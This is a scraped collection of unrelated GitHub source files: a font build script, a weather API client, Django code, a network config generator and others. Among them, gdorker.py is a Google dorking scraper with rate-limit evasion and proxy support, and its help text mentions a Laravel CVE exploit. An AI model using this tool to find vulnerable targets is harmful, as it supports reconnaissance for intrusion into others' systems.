elif vwl == \"novowel\":\n font.createChar(-1, \"bhat_%s\" % cns[0:-1]);\n font[\"bhat_%s\" % (cns[0:-1])].addReference(\"bhat_%sa\" % cns[0:-1]);\n font[\"bhat_%s\" % (cns[0:-1])].addReference(\"bhat_novowel_mark\", psMat.translate(font[\"bhat_%s\" % cns].width / 3, 0));\n \n elif vwl == \"i\" or vwl == \"ii\" or vwl == \"au\":\n font.createChar(-1, \"bhat_%s%s\" % (cns[0:-1], vwl));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%sa\" % cns[0:-1]);\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%s_mark\" % vwl, psMat.translate(font[\"bhat_%s\" % cns].width - bar_left[vwl], 0));\n\n elif vwl == \"o\":\n font.createChar(-1, \"bhat_%s%s\" % (cns[0:-1], vwl));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%sa\" % cns[0:-1], psMat.translate(260, 0));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%s_mark\" % vwl);\n \n else:\n font.createChar(-1, \"bhat_%s%s\" % (cns[0:-1], vwl));\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%sa\" % cns[0:-1]);\n font[\"bhat_%s%s\" % (cns[0:-1], vwl)].addReference(\"bhat_%s_mark\" % vwl, psMat.translate(font[\"bhat_%s\" % cns].width / 3, 0));\n\n for cp in [\"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\"]:\n font[cp].addReference(\"bhat_%s\" % cp); \n font[cp.upper()].addReference(\"bhat_%s\" % cp);\n\n for cp in [\"a\", \"i\", \"u\", \"e\", \"o\"]:\n font[cp].addReference(\"bhat_%s\" % cp);\n font[cp.upper()].addReference(\"bhat_%s\" % cp);\n\n\n font.addLookup(\"ligature1\", \"gsub_ligature\", (), ((\"ccmp\",((\"DFLT\",(\"dflt\")), (\"latn\",(\"dflt\")))),));\n font.addLookupSubtable(\"ligature1\", \"ligature1-1\");\n\n for nm in [\"ai\", \"au\", \"dh\", \"kh\", \"gh\", \"ph\", \"bh\"]:\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0], nm[1]));\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0].upper(), nm[1]));\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0], nm[1].upper()));\n font[\"bhat_%s\" % nm].addPosSub(\"ligature1-1\", (nm[0].upper(), nm[1].upper()));\n\n for el in [(\"uni1E0C\", \"dr\"), (\"uni1E0D\", \"dr\"), (\"uni1E36\", \"lr\"), (\"uni1E37\", \"lr\"), (\"uni1E46\", \"nr\"), (\"uni1E47\", \"nr\"), (\"uni1E62\", \"cr\"), (\"uni1E63\", \"cr\"), (\"uni1E6C\", \"tr\"), (\"uni1E6D\", \"tr\"), (\"Aacute\", \"aa\"), (\"aacute\", \"aa\"), (\"Iacute\", \"ii\"), (\"iacute\", \"ii\"), (\"Uacute\", \"uu\"), (\"uacute\", \"uu\")]:\n font[el[0]].addReference(\"bhat_%s\" % el[1]);\n\n\n for cns in map(lambda x: (list(x), x),[\"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\", \"dh\", \"kh\", \"gh\", \"ph\", \"bh\", ]) + [([\"uni1E0C\"], \"dr\"), ([\"uni1E0D\"], \"dr\"), ([\"uni1E36\"], \"lr\"), ([\"uni1E37\"], \"lr\"), ([\"uni1E46\"], \"nr\"), ([\"uni1E47\"], \"nr\"), ([\"uni1E62\"], \"cr\"), ([\"uni1E63\"], \"cr\"), ([\"uni1E6C\"], \"tr\"), ([\"uni1E6D\"], \"tr\")]:\n for vwl in map(lambda x: (list(x), x), [\"a\", \"i\", \"u\", \"e\", \"o\", \"ai\", \"au\"]) + [([\"Aacute\"], \"aa\"), ([\"aacute\"], \"aa\"), ([\"Iacute\"], \"ii\"), ([\"iacute\"], \"ii\"), ([\"Uacute\"], \"uu\"), ([\"uacute\"], \"uu\")]:\n syl = cns[1] + vwl[1];\n lst = cns[0] + vwl[0];\n font[\"bhat_%s\" % syl].addPosSub(\"ligature1-1\", lst);\n\n all_composed = \" \".join(\n reduce(lambda x, y: x+y,\n map(lambda v:\n map(lambda c: \"bhat_%s%s\" % (c, v), [\"\", \"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\", \"dh\", \"kh\", \"gh\", \"ph\", \"bh\", \"tr\", \"dr\", \"nr\", \"lr\", \"cr\"]), [\"a\", \"i\", \"u\", \"aa\", \"ii\", \"uu\", \"e\", \"o\", \"ai\", \"au\", \"\"]))\n + [\"a\", \"i\", \"u\", \"e\", \"o\", \"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\"]\n + map(lambda x: x.upper(), [\"a\", \"i\", \"u\", \"e\", \"o\", \"t\", \"k\", \"x\", \"s\", \"n\", \"m\", \"d\", \"g\", \"p\", \"b\", \"h\", \"c\", \"z\", \"l\", \"r\", \"j\", \"y\", \"w\"])\n + [\"uni1E0C\", \"uni1E0D\", \"uni1E36\", \"uni1E37\", \"uni1E46\", \"uni1E47\", \"uni1E62\", \"uni1E63\", \"uni1E6C\", \"uni1E6D\", \"Aacute\", \"aacute\", \"Iacute\", \"iacute\", \"Uacute\", \"uacute\"]\n );\n \n font.addLookup(\"kerning1\", \"gpos_pair\", (), ((\"kern\",((\"dflt\",(\"dflt\")), (\"latn\",(\"dflt\")))),));\n font.addKerningClass(\"kerning1\", \"kerning1-1\", [all_composed], [[], all_composed], [0, -100]);\n\n for cp in font:\n font[cp].right_side_bearing = 0;\n font[cp].left_side_bearing = 0;\n\n font[\"space\"].width = 200;\n\n \n\n\ndef main():\n font = fontforge.font();\n name = \"BhataanTransliteration\"\n\n font.fullname = name;\n font.fontname = name;\n font.familyname = name;\n\n font.encoding = \"UnicodeBmp\";\n\n create_characters(font);\n create(font);\n \n font.save(\"%s.sfd\" % name);\n font.generate(\"%s.ttf\" % name);\n font.generate(\"%s.woff\" % name);\n\nmain();\n\n","repo_name":"Haar-you/BhaataanFont","sub_path":"fonts/high-contrast/Transliteration/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37894010711","text":"import requests\nfrom typing import Dict, Any, Tuple\nfrom datetime import datetime, timedelta\nfrom json import loads\n\n#https://openweathermap.org/current\n#https://openweathermap.org/forecast5\n#https://open-meteo.com/en/docs/historical-weather-api\n#https://openweathermap.org/api/geocoding-api\nclass OpenWeatherCaller:\n try:\n with open(\"ll_web/weather_api/default_key.json\", \"r\") as f:\n api_key = loads(f.read())[\"api_key\"]\n except:\n pass\n\n def __init__(self, location: Tuple[float, float], date: str, api_key:str, range: Tuple[str, str] = None) -> None:\n #Set default values used for API calls\n self.api_key = api_key\n self.date = date\n self.range = range\n self.api_key = api_key if api_key else OpenWeatherCaller.api_key\n self.location = location\n\n def get_location(self, str_location) -> Tuple[float, float]:\n #Currently unused and untested, found to be unaccurate\n response = requests.get(f\"https://api.openweathermap.org/geo/1.0/direct?q={str_location[0]}&limit=5&appid={self.api_key}\")\n response.raise_for_status()\n response = response.json()\n self.location = (response[0][\"lat\"], response[0][\"lon\"])\n return\n\n def __restructure_openmeteo(self):\n #Restructures the response from open-meteo to match the openweathermap format\n\n formatted_days = []\n dayly = self.response['daily']\n formatted_hours = []\n #self.response['longitude']\n #For every day (in db master) ad a properly formatted day to the list\n for (time, max_temp, min_temp, sunrise, sunset, rainsum, snowsum) in\\\n zip(dayly['time'], dayly['temperature_2m_max'], dayly['temperature_2m_min'], dayly['sunrise'],\\\n dayly['sunset'], dayly['rain_sum'], dayly['snowfall_sum']):\n formatted_days.append(\\\n {'coord': \n {'lat': self.location[0], 'lon': self.location[1]},\n \n 'weather': [{}],\n 'base': 'unknown',\n 'main': {\n 'temp_min': min_temp,\n 'temp_max': max_temp,\n },\n 'visibility': 'Unknown',\n 'wind': {},\n 'rain': {'sum': rainsum},\n 'snow': {'sum': snowsum},\n 'dt': time,\n 'sys': {\n 'sunrise': sunrise,\n 'sunset': sunset,\n },\n 'name': 'unknown',\n \"source\": \"open-meteo\",\n })\n formatted_hours.append({'list': []})\n\n #For every hour (in db slave) add a properly formatted hour to the list\n hourly = self.response['hourly']\n day = 0\n for (time, temperature_2m, relativehumidity_2m, apparent_temperature, rain, snowfall, weathercode, pressure_msl,\\\n surface_pressure, windspeed_10m, winddirection_10m, windgusts_10m) in zip(hourly['time'], hourly['temperature_2m'],\\\n hourly['relativehumidity_2m'], hourly['apparent_temperature'], hourly['rain'], hourly['snowfall'], hourly['weathercode'],\\\n hourly['pressure_msl'], hourly['surface_pressure'], hourly['windspeed_10m'], hourly['winddirection_10m'], hourly['windgusts_10m']):\n \n if not len(formatted_days) == day+1 and time >= formatted_days[day +1]['dt']:\n day += 1\n \n formatted_hours[day]['list'].append(\n {\n 'dt': time,\n 'main': {\n 'temp': temperature_2m,\n 'feels_like': apparent_temperature,\n 'humidity': relativehumidity_2m,\n 'sea_level': pressure_msl,\n 'grnd_level': surface_pressure,\n },\n 'weather': [\n {\n 'id': weathercode,\n }\n ],\n \"clouds\": {},\n \"wind\": {\n \"speed\": windspeed_10m,\n \"deg\": winddirection_10m,\n \"gust\": windgusts_10m,\n },\n \"visibility\": \"unknown\",\n \"pop\": None,\n \"rain\": {\n \"1h\": rain,\n },\n \"snow\": {\n \"1h\": snowfall,\n },\n \"sys\": {\n \"sunrise\": formatted_days[day][\"sys\"][\"sunrise\"],\n \"sunset\": formatted_days[day][\"sys\"][\"sunset\"],\n },\n \"source\": \"open-meteo\",\n }\n )\n #Return the formatted response\n return {'daily': formatted_days, 'hourly': formatted_hours}\n \n \n\n def __get_current_weather(self) -> Dict[str, Any]:\n #Calls openweathermap API for current weather, no additional information needed\n response = requests.get(f\"https://api.openweathermap.org/data/2.5/weather?lat={self.location[0]}&lon={self.location[1]}&units=metric&appid={self.api_key}\")\n response.raise_for_status()\n return response.json()\n\n def __get_forecast_weather(self) -> Dict[str, Any]:\n #Calls openweathermap API for forecast weather, no additional information needed\n response = requests.get(f\"https://api.openweathermap.org/data/2.5/forecast?lat={self.location[0]}&lon={self.location[1]}&units=metric&appid={self.api_key}\")\n response.raise_for_status()\n return response.json()\n\n def __get_historical_weather(self) -> Dict[str, Any]:\n #Calls open-meteo API for historical weather, needs a a time range\n #And restructures the response to match the openweathermap format\n response = requests.get(f\"https://archive-api.open-meteo.com/v1/archive?latitude={self.location[0]}&longitude={self.location[1]}&start_date={self.range[0]}&end_date={self.range[1]}&hourly=temperature_2m,relativehumidity_2m,apparent_temperature,rain,snowfall,weathercode,pressure_msl,surface_pressure,windspeed_10m,winddirection_10m,windgusts_10m&daily=temperature_2m_max,temperature_2m_min,sunrise,sunset,rain_sum,snowfall_sum&timeformat=unixtime&timezone=GMT\")\n response.raise_for_status()\n self.response = response.json()\n return self.__restructure_openmeteo()\n\n def get_weather(self):\n #Selects the correct API call based on the date, returns the response\n if self.date == \"now\":\n return self.__get_current_weather()\n elif self.date == \"forecast\":\n return self.__get_forecast_weather()\n else:\n return self.__get_historical_weather()\n'https://archive-api.open-meteo.com/v1/archive?latitude=53.5453&longitude=9.9953&start_date=2023-09-19&end_date=2023-09-23&hourly=temperature_2m,relativehumidity_2m,apparent_temperature,rain,snowfall,weathercode,pressure_msl,surface_pressure,windspeed_10m,winddirection_10m,windgusts_10m&daily=temperature_2m_max,temperature_2m_min,sunrise,sunset,rain_sum,snowfall_sum&timeformat=unixtime&Europe%2FBerlin'","repo_name":"Katzenkralle/link_list","sub_path":"ll_web/weather_api/open_weather_caller.py","file_name":"open_weather_caller.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"6090140545","text":"# -*- coding: utf-8 -*-\nfrom orangengine.drivers import JuniperSRXDriver\nfrom orangengine.drivers import PaloAltoPanoramaDriver\n\n\nDRIVER_MAPPINGS = {\n 'juniper_srx': JuniperSRXDriver,\n 'palo_alto_panorama': PaloAltoPanoramaDriver,\n}\n\nplatforms = list(DRIVER_MAPPINGS.keys())\n\n\ndef dispatch(*args, **kwargs):\n \"\"\"driver connection factory\"\"\"\n\n if kwargs['device_type'] not in platforms:\n raise ValueError('Platform is not currently supported.')\n\n Driver = DRIVER_MAPPINGS[kwargs['device_type']]\n return Driver(*args, **kwargs)\n","repo_name":"lampwins/orangengine","sub_path":"orangengine/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"79"} +{"seq_id":"6932605512","text":"from opcoes import number_to_string\nimport sys\n\nif __name__ == \"__main__\":\n sys.setrecursionlimit(11000)\n sair = 1\n while sair!=0:\n op = input(\"Digite a opcao desejada:\\n1-Merge Sort\\n0-Sair\\nResposta:\")\n op = int(op)\n sair = op\n number_to_string(op)","repo_name":"yarion1/Trabalho-PAA-","sub_path":"Merge sort/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13873402782","text":"from rest_framework.generics import ListAPIView, RetrieveAPIView\nfrom .models import Mobile\nfrom .serializers import MobileSerializer\n\n\nclass SuggestMobileView(ListAPIView):\n serializer_class = MobileSerializer\n\n def get_queryset(self):\n min_price = self.request.GET.get('min_price', None)\n max_price = self.request.GET.get('max_price', None)\n min_date = self.request.GET.get('min_date', None)\n max_date = self.request.GET.get('max_date', None)\n queryset = Mobile.objects.all()\n\n if max_price:\n queryset = queryset.filter(price__lte=max_price)\n if min_price:\n queryset = queryset.filter(price__gte=min_price)\n if max_date:\n queryset = queryset.filter(production_date__lte=max_date)\n if min_date:\n queryset = queryset.filter(production_date__gte=min_date)\n\n if self.request.user.is_anonymous:\n return queryset[:1]\n\n return queryset\n\n\n","repo_name":"mohammadsaleh81/mobo_suggest","sub_path":"product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9094695787","text":"import email\r\nfrom email import message\r\nfrom django.db import models\r\n\r\n# Create your models here.\r\nclass Animal(models.Model):\r\n SPECIE_CHOICES = (\r\n ('mammal', 'Mammal'),\r\n ('amphibian', 'Amphibian'),\r\n ('reptile', 'Reptile'),\r\n ('pices', 'Pices'),\r\n ('aves', 'Aves')\r\n )\r\n\r\n name = models.CharField(max_length=200, unique=True)\r\n desc = models.TextField()\r\n dob = models.DateField()\r\n specie = models.CharField(max_length=200, choices=SPECIE_CHOICES)\r\n population = models.IntegerField(default=0)\r\n is_extinct = models.BooleanField()\r\n pic_url = models.URLField()\r\n date_created =models.DateTimeField(auto_now_add=True)\r\n date_updated = models.DateTimeField(auto_now=True)\r\n viewing_price =models.FloatField(default=0)\r\n\r\n def __str__(self):\r\n return self.name\r\n\r\nclass Contact(models.Model):\r\n name = models.CharField(max_length=50)\r\n email = models.CharField(max_length=50)\r\n message = models.TextField(max_length=200)\r\n\r\n # def contact_us(request):\r\n # if request.method==\"POST\":\r\n # request_data = dict(request.POST)\r\n # request_data.pop('csrfmiddlewaretoken')\r\n # data = {key:request_data.get(key)[0] for key in request_data}\r\n # print(data)\r\n def __str__(self):\r\n return self.name","repo_name":"Udokaamos/web-app","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42538890131","text":"import json\nimport os\nfrom time import sleep\nfrom urllib.parse import urlparse\nfrom bs4 import BeautifulSoup\nimport requests\nimport argparse\n\n\ndef main(queries: list, no_filter: False, max_pages: 100, sleep_per_page: 60, output_path=\"output.json\", socks5_proxy={}):\n print(f\"[•] Scan starting with settings: Max pages: {max_pages}, Sleep per page: {sleep_per_page}, Disable filter: \"+(\"Yes\" if no_filter else \"No\")+\".\")\n\n for input in queries:\n query = input.replace(\" \", \"+\")\n print(f\"[@] Dorking \\\"{input}\\\"...\")\n get_page_results(href=f\"https://www.google.com/search?q={query}&oq={query}&sourceid=chrome&ie=UTF-8&num=\"+str(max_pages+2)+(\"&filter=0\" if no_filter else \"\"), output_path=output_path, sleep_per_page=sleep_per_page, proxies=socks5_proxy)\n sleep(sleep_per_page)\n\n print(\"[√] Done.\")\n\n\ndef get_page_results(href, output_path, sleep_per_page=60, proxies={}):\n\n # Get contents\n response = requests.get(\n url=href, \n headers={\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\",\n \"Cache-Control\": \"max-age=0\",\n \"sec-ch-ua\": \"\\\"Chromium\\\";v=\\\"106\\\", \\\"Google Chrome\\\";v=\\\"106\\\", \\\"Not;A=Brand\\\";v=\\\"99\\\"\",\n \"sec-ch-ua-mobile\": \"?0\",\n \"sec-ch-ua-platform\": \"\\\"macOS\\\"\",\n \"sec-fetch-dest\": \"iframe\",\n \"sec-fetch-mode\": \"navigate\",\n \"sec-fetch-site\": \"same-site\",\n \"upgrade-insecure-requests\": \"1\",\n \"referer\": \"https://www.google.com/\"\n },\n allow_redirects=True,\n proxies=proxies\n )\n\n if response.status_code == 429:\n print(f\"[!] You are sending too many requests. Waiting {(sleep_per_page * 3)} seconds for next request...\")\n sleep(sleep_per_page * 3)\n print(\"[•] Sleep over. Trying again...\")\n get_page_results(href=href, output_path=output_path)\n return\n\n # Parse contents\n parsed = urlparse(response.url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n total = 0\n\n # Get search results\n result_block = soup.find_all(\"div\", attrs={\"class\": \"g\"})\n print(f\"[√] Found {len(result_block)} potential links.\")\n for result in result_block:\n link = result.find(\"a\", href=True)\n success = output_link(link=link['href'], output_path=output_path)\n if success:\n total += 1\n\n print(f\"[√] Found {total} fresh discovered links.\")\n\n # Next page if possible\n current_page = soup.select_one(\"#botstuff [role='navigation'] td:not(:has(a))\")\n next_btn = soup.find(\"a\", attrs={\"id\": \"pnnext\"})\n\n if next_btn:\n if current_page and current_page.text:\n print(f\"[•] Next page {int(current_page.text) + 1}...\")\n else:\n print(f\"[•] Next page...\")\n\n sleep(sleep_per_page)\n\n get_page_results(href=f\"{parsed.scheme}://{parsed.netloc}{next_btn['href']}\", output_path=output_path)\n\n\ndef output_link(link, output_path):\n if os.path.exists(output_path):\n # Read\n output_file = open(output_path, \"r\")\n output_content = output_file.read()\n output_arr = json.loads(output_content)\n output_file.close()\n else:\n output_arr = []\n\n if not link.startswith(\"https://\") and not link.startswith(\"http://\"):\n return\n\n # Add result to list\n if link not in output_arr:\n output_arr.append(link)\n\n # Write\n output_file = open(output_path, \"w\")\n output_file.write(json.dumps(output_arr))\n output_file.close()\n\n return True\n\n\nif __name__ == \"__main__\":\n # Credits\n print(\"G-Dorker, a Python3 Google dorking tool\")\n print(\"[•] Made by: https://github.com/joshuavanderpoll/G-Dorker\")\n\n # Arguments\n parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script')\n parser.add_argument('--query', help='Query to search', required=False)\n parser.add_argument('--unfilter', help='Disables Google filter feature (Causes lot of duplicate sites)', required=False, default=False, action='store_true')\n parser.add_argument('--sleep', help='Amount of time to sleep per page', required=False, default=60, type=int)\n parser.add_argument('--pages', help='Request of results per request', required=False, default=25, type=int)\n parser.add_argument('--queries', help='Path to JSON list with queries', required=False)\n parser.add_argument('--output', help='Path to output JSON file', required=False, default=\"output.json\")\n \n parser.add_argument('--socks5-host', help='SOCKS5 HTTP/HTTPS Proxy host', required=False)\n parser.add_argument('--socks5-port', help='SOCKS5 HTTP/HTTPS Proxy port', required=False)\n parser.add_argument('--socks5-user', help='SOCKS5 HTTP/HTTPS Proxy username', required=False)\n parser.add_argument('--socks5-pwd', help='SOCKS5 HTTP/HTTPS Proxy password', required=False)\n\n args = parser.parse_args()\n proxies = {}\n\n # Check if valid execution\n if not args.queries and not args.query:\n print(\"[!] Please use the \\\"--query\\\" or \\\"--queries\\\" parameter.\")\n exit(1)\n\n # Get queries to dork\n queries = []\n if args.queries:\n if not os.path.exists(args.queries):\n print(f\"[!] Queries file \\\"{args.queries}\\\" does not exists\")\n exit(1)\n \n query_stream = open(args.queries, \"r\")\n queries = json.loads(query_stream.read())\n query_stream.close()\n else:\n queries.append(args.query)\n\n # Validate output path\n if os.path.exists(args.output):\n overwrite = input(f\"[?] The output file \\\"{args.output}\\\" already exists. Are you sure you want to append or overwrite this? (y/a/n) \").lower()\n if overwrite == \"y\":\n os.unlink(args.output)\n elif overwrite == \"a\":\n pass\n elif overwrite == \"n\":\n print(\"[!] Please you another \\\"--output\\\" path.\")\n exit(1)\n else:\n print(\"[!] Invalid response.\")\n exit(1)\n\n # Page validation\n if args.pages > 100:\n print(\"[!] Google only allows a maximum of 100 results per request. Change the \\\"--pages\\\" argument to a number below 100 to continue\")\n exit(1)\n\n # SOCKS5 Proxy validation\n if args.socks5_host:\n if not args.socks5_port:\n print(f\"[!] Please use the \\\"--socks5-port\\\" when using \\\"--socks5-host\\\".\")\n exit(1)\n \n if args.socks5_user and args.socks5_pwd:\n proxies = {\"http\": f\"{args.socks5_user}:{args.socks5_pwd}@{args.socks5_host}:{args.socks5_port}\", \"https\": f\"{args.socks5_user}:{args.socks5_pwd}@{args.socks5_host}:{args.socks5_port}\"}\n else:\n proxies = {\"http\": f\"{args.socks5_host}:{args.socks5_port}\", \"https\": f\"{args.socks5_host}:{args.socks5_port}\"}\n\n main(no_filter=args.unfilter, max_pages=args.pages, sleep_per_page=args.sleep, queries=queries, output_path=args.output, socks5_proxy=proxies)","repo_name":"joshuavanderpoll/G-Dorker","sub_path":"gdorker.py","file_name":"gdorker.py","file_ext":"py","file_size_in_byte":7038,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"17256389819","text":"from sklearn import linear_model\nimport numpy as np\n\n\ndef lossfit(entity):\n set_feature, set_target = get_features_target(entity)\n\n regs = {}\n for col in entity.df.columns:\n regs[col] = linear_model.LinearRegression()\n regs[col].fit(set_feature[col], set_target[col])\n\n for index, row in entity.df.iterrows():\n if not row.hasnans:\n continue\n col_lossy, features = get_lossy_features(row)\n if col_lossy is not None:\n est = regs[col_lossy].predict([features])\n entity.df[col_lossy][index] = est\n\n\ndef get_lossy_features(row):\n features = []\n col_lossy = None\n for col, val in row.iteritems():\n if np.isnan(val):\n if col_lossy is None:\n col_lossy = col\n else:\n return None, None\n else:\n features.append(val)\n\n return col_lossy, features\n\n\ndef get_features_target(entity):\n n_cols = len(entity.df.columns)\n set_feature = {}\n set_target = {}\n for col in entity.df.columns:\n set_feature[col] = []\n set_target[col] = []\n\n for index, row in entity.df.iterrows():\n if row.hasnans:\n continue\n\n set_feature[row.index[0]].append(row[1:])\n set_target[row.index[0]].append(row[0])\n\n for i in range(1, n_cols - 1):\n set_feature[row.index[i]].append(row[:i] + row[i + 1:])\n set_target[row.index[i]].append(row[i])\n\n set_feature[row.index[n_cols - 1]].append(row[:n_cols - 1])\n set_target[row.index[n_cols - 1]].append(row[n_cols - 1])\n\n return set_feature, set_target\n","repo_name":"yunyun3599/qufafeat","sub_path":"featuretools/entityset/lossfit.py","file_name":"lossfit.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"39923373610","text":"import heapq\ndef solution(operations):\n heap=[]\n for i in operations:\n op, n= i.split(\" \")\n if op==\"I\":\n heapq.heappush(heap,int(n))\n if i==\"D -1\" and heap:\n heapq.heappop(heap)\n if i==\"D 1\" and heap:\n heap=list(heap)\n heap.sort()\n heap.pop()\n heapq.heapify(heap)\n list(heap)\n if len(heap)>1:\n heap.sort()\n ma=heap[-1]\n mi=heap[0]\n return [ma,mi]\n elif len(heap)==1:\n return [heap[0],heap[0]]\n else:\n return [0,0]","repo_name":"ChoiYeongChan/BOJ","sub_path":"프로그래머스/lv3/42628. 이중우선순위큐/이중우선순위큐.py","file_name":"이중우선순위큐.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11337693107","text":"# %%\nimport sys\nimport yaml\nimport os\n\n# %%\n# Ensure that a command line argument is given (or the project is running in a Jupyter notebook)\ntry:\n ipy_str = str(type(get_ipython()))\n if 'zmqshell' in ipy_str or 'terminal' in ipy_str:\n # Running in Jupyter or iPython\n projectName = input(\"Enter project name: \")\nexcept:\n # Running in terminal\n if len(sys.argv) < 2:\n projectName = input(\"Enter project name: \")\n elif len(sys.argv) > 2:\n raise Exception(\"Too many command line arguments given\")\n else:\n projectName = sys.argv[1]\n\n# Import YAML configuration for project\ntry:\n scriptLocation = os.path.realpath(__file__)\n scriptDirectory = os.path.dirname(scriptLocation)\n\n projectStream = open(\"{scriptDirectory}/{projectName}/ProjectConfig.yaml\".format(scriptDirectory=scriptDirectory, projectName=projectName), 'r')\n projectConfig = yaml.safe_load(projectStream)\nexcept:\n raise Exception(\"Project configuration could not be opened\")\n\nfirmwareFolder = projectConfig['firmwareFolder']\nhdlFolder = projectConfig['hdlFolder']\n\n# %%\nfrom FoxNetwork import *\nfrom Firmware import *\nfrom FoxConfig import *\n\nconfig = FoxConfig(configFolder=projectName)\nconfig.import_network_config()\nconfig.import_firmware_config()\n\n# %%\nif config.foxFirmware is not None:\n foxFirmware = Firmware(name=config.foxFirmware, memSize=config.foxFirmwareMemSize)\n foxFirmware.write_assembly_file(firmwareFolder)\n foxFirmware.write_makefile_variables(firmwareFolder)\nelse:\n foxFirmware = None\n\nif config.resultFirmware is not None:\n resultFirmware = Firmware(name=config.resultFirmware, memSize=config.resultFirmwareMemSize)\n resultFirmware.write_assembly_file(firmwareFolder)\n resultFirmware.write_makefile_variables(firmwareFolder)\nelse:\n resultFirmware = None\n\n# %%\nfoxNetwork = FoxNetwork(networkRows=config.networkRows, \\\n networkCols=config.networkCols, \\\n resultNodeCoord=config.resultNodeCoord, \\\n romNodeCoord=config.romNodeCoord, \\\n totalMatrixSize=config.totalMatrixSize, \\\n foxNetworkStages=config.foxNetworkStages, \\\n multicastGroupBits=config.multicastGroupBits,\\\n multicastCoordBits=config.multicastCoordBits,\\\n readyFlagBits=config.readyFlagBits, \\\n resultFlagBits=config.resultFlagBits, \\\n matrixTypeBits=config.matrixTypeBits, \\\n matrixCoordBits=config.matrixCoordBits, \\\n foxFirmware=foxFirmware, \\\n resultFirmware=resultFirmware, \\\n A=A, \\\n B=B, \\\n useMatrixInitFile=config.useMatrixInitFile, \\\n multicastAvailable=config.multicastAvailable, \\\n useMulticast=config.useMulticast, \\\n multicastGroupNodes=config.multicastGroupNodes, \\\n multicastNetworkRows=config.multicastNetworkRows, \\\n multicastNetworkCols=config.multicastNetworkCols, \\\n multicastFifoDepth=config.multicastFifoDepth, \\\n foxNodeFifos=config.foxNodeFifos, \\\n resultNodeFifos=config.resultNodeFifos, \\\n resultUartFifoDepth=config.resultUartFifoDepth, \\\n hdlFolder=hdlFolder, \\\n firmwareFolder=firmwareFolder)\n\n# %%\nfoxNetwork.create_matrix_init_files()\n\n# %%\nfoxNetwork.write_packet_header_file()\n\n# %%\nfoxNetwork.write_network_header_file()\n\n# %%\nfoxNetwork.write_multicast_header_file()\n\n# %%\nfoxNetwork.write_matrix_config_file()\n\n# %%\nfoxNetwork.write_firmware_config_file()\n","repo_name":"hprice99/ENGG4811_code","sub_path":"scripts/fox_network_generate.py","file_name":"fox_network_generate.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6865414855","text":"\"\"\"migrate func keys with args\n\nRevision ID: dd0c465315d\nRevises: 4ce50bcf2a0e\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'dd0c465315d'\ndown_revision = '4ce50bcf2a0e'\n\nfrom alembic import op\nfrom sqlalchemy import sql\nimport sqlalchemy as sa\n\n\nTYPE_SPEEDDIAL = 'speeddial'\n\nDESTINATION_FORWARD_ID = 6\nDESTINATION_FORWARD_NAME = 'forward'\n\nFORWARD_TYPES = ('fwdrna',\n 'fwdbusy',\n 'fwdunc')\n\nphonefunckey_table = sql.table('phonefunckey',\n sql.column('iduserfeatures'),\n sql.column('fknum'),\n sql.column('exten'),\n sql.column('typeextenumbers'),\n sql.column('typevalextenumbers'),\n sql.column('typeextenumbersright'),\n sql.column('typevalextenumbersright'),\n sql.column('label'),\n sql.column('supervision'),\n sql.column('progfunckey'))\n\nfunc_key_table = sql.table('func_key',\n sql.column('id'),\n sql.column('type_id'),\n sql.column('destination_type_id'))\n\ndestination_forward_table = sql.table('func_key_dest_forward',\n sql.column('func_key_id'),\n sql.column('destination_type_id'),\n sql.column('extension_id'),\n sql.column('number'))\n\nfunc_key_type_table = sql.table('func_key_type',\n sql.column('id'),\n 